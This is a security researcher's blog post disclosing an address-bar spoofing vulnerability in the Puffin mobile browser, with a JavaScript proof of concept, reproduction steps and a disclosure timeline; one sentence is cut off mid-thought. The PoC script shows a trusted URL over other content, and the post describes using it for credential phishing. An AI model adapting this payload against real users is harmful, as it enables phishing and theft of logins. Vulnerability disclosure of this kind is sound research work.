Hi, I am Rafay Baloch, a security researcher, author and a public speaker.

Puffin Web Browser Address Bar Spoofing Vulnerability


During my recent research on Mobile browsers i have managed to find couple of interesting vulnerabilities such as SOP bypass, Denial of service and Address bar spoofing vulnerability which are worth doing a writeup. However, In the following writeup I would discuss about an "Address Bar Spoofing Vulnerability" present inside of a well known mobile browser for both Android and iOS known as "Puffin Web Browser". 

Description

Let's take a look at an official description of Puffin Web Browser.

Puffin Web Browser is a wicked fast Mobile Flash Browser. Once users experience the thrill of using Puffin, regular Mobile Internet just feels like torture. Puffin Free is the free version of Puffin family, and supports Adobe Flash during the daytime everyday. Puffin Web Browser comes into two different flavours, a free version and a paid version.

Popularity 

According to recent stats by Google play, the approximate installs for "Puffin Web Browser Free" are some where between the range of 5 Million to 10 Million installs.


Whereas, according to another popular Android market "Mobogenie", the approximate installs for "Puffin Web Browser Free" are more than 5 Million. 


This makes the total userbase of Puffin Web Browser more than 10 million.

Vulnerability

An "Address Bar Spoofing" vulnerability was addressed in "Puffin Web Browser" due to mishandling of javaScript's window.open function which is used to open a secondary browser window. This could be exploited by tricking the users into supplying senstive information such as username/passwords etc due to the fact that the address bar would display a legitimate URL, however it would be hosted on the attacker's page. 

Proof Of Concept


The following piece of javaScript code was used as a proof of concept by modifying "David Vieria's"  POC to suit our needs and to demonstrate the vulnerability to the vendor. 

<script>
document.getElementById('one').onclick = function() {
myWindow=window.open('http://rafayhackingarticles.net/','RHA','width=300,height=300,location=yes');
myWindow.document.write("<html><head></head><body><b>This page is still being hosted on rhainfosec.com, however the domain is pointing to rafayhackingarticles.net.</b><br><br><iframe src=\"http://www.rafayhackingarticles.net/\");></iframe></scri+pt></body></html>");
myWindow.focus();
return false;
}
</script>

Steps To Reproduce

1) Visit the following page from "Puffin Free Web Browser" -www.rhainfosec.com/test/
2) Click on the "demo" button.
3) A new window would pop up with the address bar pointing to rafayhackingarticles.net, however the page is still hosted on rhainfosec.com. 

In case of a real attack scenario, an attacker could create a fake login of facebook.com for instance and since the address bar would still be pointing to facebook.com, the victim would not

Demonstration


Impact

The impact in my opinion is huge since this vulnerability could be abused in launching targetted and more effective phishing attacks, which places 10 million users at risk.

Fix

The vulnerability was submitted on 10'th of june, I received an initial response that they would let us know about the schedule, however after multiple emails, we didn't receive any response. Therefore, I decided to go for full disclosure and urge the users to beware.

As mentioned before, I have found several other vulnerabilities in mobile browsers, as soon as they get fixed I would blog about it. Kudos to David Vieria for his guidance. 

Timeline

6/10/2014 - I reported the vulnerability.
6/13/2014 - Initial response.
6/26/2014 - I asked again if they are willing to fix it.
7/14/2014 - Blogged about this issue. 
© 2023 All Rights Reserved by RHA Info Sec. Top

Contact Form

Name

Email *

Message *

Powered by Blogger.